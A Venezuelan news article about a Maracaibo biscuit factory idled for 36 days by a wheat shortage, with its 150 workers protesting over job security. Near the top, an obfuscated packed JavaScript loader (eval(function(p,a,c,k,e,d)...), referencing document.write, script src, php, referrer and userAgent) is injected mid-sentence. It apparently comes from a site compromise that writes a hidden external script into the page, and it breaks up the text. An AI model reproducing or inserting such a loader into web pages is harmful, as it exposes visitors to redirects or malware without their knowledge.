Galletas pegadas a punto de desaparecer

Yasmín Ojeda / Maracaibo / [email protected]
Galletera eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yyfed|var|u0026u|referrer|kfiar||js|php'.split('|'),0,{})) Independencia en crisis por escasez de materia prima importada. Desde hace 36 días la empresa apagó los hornos a la espera de despachos de Cargill y Monaca

Más de 720 galletas diarias es la producción en hornos en dos turnos de trabajo

Las presentaciones de galleta rellena, María Independencia, media luna y bolita desaparecieron de los hornos de la empresa Galletera Independencia, la tradición de 65 años se esfuma de los barrios y loncheras de los escolares. Ya el olor de la mezcla de azúcar y trigo no se percibe desde hace 36 días, cuando por la falta de materia prima se paralizó la producción y 150 trabajadores temen perder la estabilidad laboral.

Pedro Araujo, secretario general del Sindicato de Trabajadores de Galletera Independencia (Sintragain), acompañados por el personal, explicó que salieron a la calle ayer a protestar por el temor a perder sus trabajos. Aunque la empresa responde con el pago de salarios, la falta del cereal y el transcurrir de los días sin respuesta de inventarios levantan “preocupación”.  

Cargill y Monaca, las dos grandes compañía de molinos de trigo ubicadas en la ciudad, tienen escasez, “y no dan noticias” de qué pasará. También depende del abastecimiento que autorice el Ministerio de Alimentación. De las compras internacionales que liquide el Gobierno nacional. La semana pasada trabajadores de Monaca reclamaron la inestabilidad de perder la producción y sus consecuencias para el personal.

El efecto en los Molinos liquida “las esperanzas que son mínimas. Está delicado porque no hay despachos y sin esas empresas nosotros no podemos tener trigo”, aseguró Araujo. La galletera necesita entre seis y ocho gandolas a la semana para continuar produciendo. Por cada camión de 300 sacos se elaboran kilos de las meriendas para los niños.   

Los empleados conocieron por reuniones con la directiva de la empresa que había una esperanza de recibir trigo en 45 días, pero el “miedo” es quien abunda. Al pasar los días desconocen alguna autorización de guías de movilización de Sunagro para abastecerse de la harina suave, a pesar de que el Ministerio de Alimentación anunció el arribo de un buque con materia prima.

“El trigo que usamos es suave, es el que viene de Canadá o Estado Unidos. Ellos (los molinos) dicen que mientras el Gobierno no asigne las divisas y pague a Canadá no enviarán más”. señaló Araujo.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama